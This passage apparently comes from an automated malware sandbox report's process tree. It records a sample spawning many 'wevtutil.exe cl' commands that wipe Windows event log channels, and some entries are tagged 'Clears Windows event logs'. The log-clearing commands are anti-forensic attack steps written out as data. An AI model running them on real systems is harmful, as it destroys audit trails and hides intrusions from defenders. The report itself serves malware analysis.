  PID:2844
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
  2⤵
  PID:4232
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
  2⤵
  PID:1484
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
  2⤵
  PID:2536
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
  2⤵
  PID:936
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
  2⤵
  PID:4336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
  2⤵
  PID:3956
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
  2⤵
  PID:2896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
  2⤵
  PID:4076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
  2⤵
  PID:4120
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
  2⤵
  PID:1572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
  2⤵
  PID:4112
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
  2⤵
  PID:4572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
  2⤵
  PID:1612
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
  2⤵
  - Clears Windows event logs
  PID:908
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
  2⤵
  PID:2008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
  2⤵
  PID:4068
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
  2⤵
  PID:2572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
  2⤵
  - Clears Windows event logs
  PID:5040
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
  2⤵
  PID:3504
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
  2⤵
  PID:3884
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
  2⤵
  PID:960
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
  2⤵
  PID:3280
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
  2⤵
  PID:1304
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
  2⤵
  PID:4368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
  2⤵
  PID:1944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
  2⤵
  PID:2472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
  2⤵
  PID:2976
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
  2⤵
  PID:4612
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
  2⤵
  PID:5076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"
  2⤵
  - Clears Windows event logs
  PID:2644
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"
  2⤵
  PID:4320
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
  2⤵
  PID:3360
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
  2⤵
  PID:1452
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
  2⤵
  PID:5024
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
  2⤵
  PID:3292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
  2⤵
  PID:4468
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
  2⤵
  PID:4300
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
  2⤵
  PID:1576
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
  2⤵
  PID:4288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
  2⤵
  PID:2580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
  2⤵
  PID:1140
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
  2⤵
  PID:4124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
  2⤵
  PID:4380
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
  2⤵
  PID:1896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
  2⤵
  PID:4868
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
  2⤵
  PID:3472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
  2⤵
  PID:3812
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
  2⤵
  PID:4452
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
  2⤵
  PID:4292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
  2⤵
  PID:4896
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
  2⤵
  PID:2292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
  2⤵
  PID:2712
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
  2⤵
  PID:312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
  2⤵
  PID:944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
  2⤵
  PID:3368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
  2⤵
  PID:3132
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
  2⤵
  PID:2488
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
  2⤵
  PID:3200
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
  2⤵
  PID:4576
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
  2⤵
  - Clears Windows event logs
  PID:412
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Help/Operational"
  2⤵
  PID:2196
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
  2⤵
  PID:3116
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
  2⤵
  PID:4856
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
  2⤵
  PID:3476
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:2964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
  2⤵
  PID:5048
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
  2⤵
  PID:2648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
  2⤵
  PID:4920
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
  2⤵
  PID:4160
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
  2⤵
  PID:3676
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
  2⤵
  PID:1552
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
  2⤵
  PID:3744
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
  2⤵
  PID:4940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
  2⤵
  PID:3144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
  2⤵
  PID:4792
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
  2⤵
  PID:3220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
  2⤵
  - Clears Windows event logs
  PID:3536
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
  2⤵
  PID:3084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
  2⤵
  PID:3276
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
  2⤵
  PID:4580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"
  2⤵
  PID:3944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"
  2⤵
  PID:3096
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"
  2⤵
  PID:4764
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
  2⤵
  PID:1216
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
  2⤵
  - Clears Windows event logs
  PID:4004
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
  2⤵
  PID:1532
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
  2⤵
  PID:4788
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
  2⤵
  PID:4144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
  2⤵
  PID:440
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
  2⤵
  PID:1988
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
  2⤵
  PID:3212
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
  2⤵
  PID:1144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
  2⤵
  PID:3860
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
  2⤵
  PID:2840
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
  2⤵
  PID:4364
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
  2⤵
  PID:1184
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
  2⤵
  PID:4236
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
  2⤵
  PID:1872
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
  2⤵
  PID:2344
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
  2⤵
  PID:1068
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
  2⤵
  PID:1076
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
  2⤵
  PID:2392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"
  2⤵
  PID:2376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"
  2⤵
  PID:744
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
  2⤵
  PID:1252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
  2⤵
  PID:3464
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
  2⤵
  PID:3596
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
  2⤵
  PID:2272
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
  2⤵
  PID:1732
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
  2⤵
  PID:4512
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
  2⤵
  PID:2096
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
  2⤵
  PID:972
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
  2⤵
  PID:2852
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
  2⤵
  PID:964
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
  2⤵
  PID:1632
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
  2⤵
  PID:624
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
  2⤵
  PID:3124
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
  2⤵
  PID:428
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
  2⤵
  PID:4068
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
  2⤵
  PID:2572
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
  2⤵
  PID:5040
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
  2⤵
  PID:3504
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
  2⤵
  PID:3884
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
  2⤵
  PID:960
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
  2⤵
  PID:3280
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
  2⤵
  PID:1304
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
  2⤵
  PID:4368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
  2⤵
  - Clears Windows event logs
  PID:1944
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
  2⤵
  PID:436
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
  2⤵
  PID:3260
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
  2⤵
  PID:1764
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
  2⤵
  - Clears Windows event logs
  PID:2028
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"
  2⤵
  PID:3672
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
  2⤵
  PID:4648
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
  2⤵
  PID:3360
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:1452
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
  2⤵
  PID:5024
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
  2⤵
  - Clears Windows event logs
  PID:3292
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
  2⤵
  PID:4468
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
  2⤵
  PID:4300
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
  2⤵
  PID:1576
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
  2⤵
  PID:4288
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
  2⤵
  PID:2580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
  2⤵
  PID:1492
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
  2⤵
  PID:2004
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
  2⤵
  - Clears Windows event logs
  PID:4540
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
  2⤵
  PID:2252
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
  2⤵
  PID:5104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
  2⤵
  PID:4156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
  2⤵
  PID:4200
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
  2⤵
  PID:3880
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
  2⤵
  PID:3432
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
  2⤵
  PID:4472
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
  2⤵
  PID:3780
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
  2⤵
  PID:2192
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
  2⤵
  PID:4624
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
  2⤵
  PID:4116
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
  2⤵
  PID:4768
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
  2⤵
  PID:3364
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
  2⤵
  PID:5008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
  2⤵
  PID:3492
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
  2⤵
  PID:1180
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"
  2⤵
  PID:5068
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"
  2⤵
  PID:376
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"
  2⤵
  PID:3736
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
  2⤵
  PID:1020
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
  2⤵
  PID:3832
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
  2⤵
  - Clears Windows event logs
  PID:3740
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
  2⤵
  PID:996
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
  2⤵
  PID:2600
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
  2⤵
  PID:1460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
  2⤵
  PID:2368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
  2⤵
  PID:4316
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
  2⤵
  PID:4308
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
  2⤵
  PID:3744
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
  2⤵
  PID:4940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
  2⤵
  PID:3144
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
  2⤵
  PID:4792
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
  2⤵
  PID:3220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
  2⤵
  PID:3536
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
  2⤵
  PID:3084
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
  2⤵
  PID:3276
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
  2⤵
  PID:4580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
  2⤵
  PID:4460
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
  2⤵
  PID:3440
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
  2⤵
  PID:3940
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
  2⤵
  PID:1828
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
  2⤵
  PID:2024
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
  2⤵
  PID:2240
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
  2⤵
  PID:708
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
  2⤵
  PID:4828
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
  2⤵
  PID:5032
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
  2⤵
  PID:3264
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
  2⤵
  PID:3948
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
  2⤵
  PID:3500
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
  2⤵
  PID:5052
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
  2⤵
  PID:4524
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
  2⤵
  PID:1520
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
  2⤵
  PID:4980
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
  2⤵
  PID:3160
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
  2⤵
  PID:1916
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
  2⤵
  - Clears Windows event logs
  PID:4800
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
  2⤵
  PID:4496
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
  2⤵
  PID:1636
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
  2⤵
  PID:1580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
  2⤵
  PID:2844
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
  2⤵
  PID:4232
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
  2⤵
  PID:1484
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
  2⤵
  PID:2536
- C:\Windows\system32\wevtutil.exe
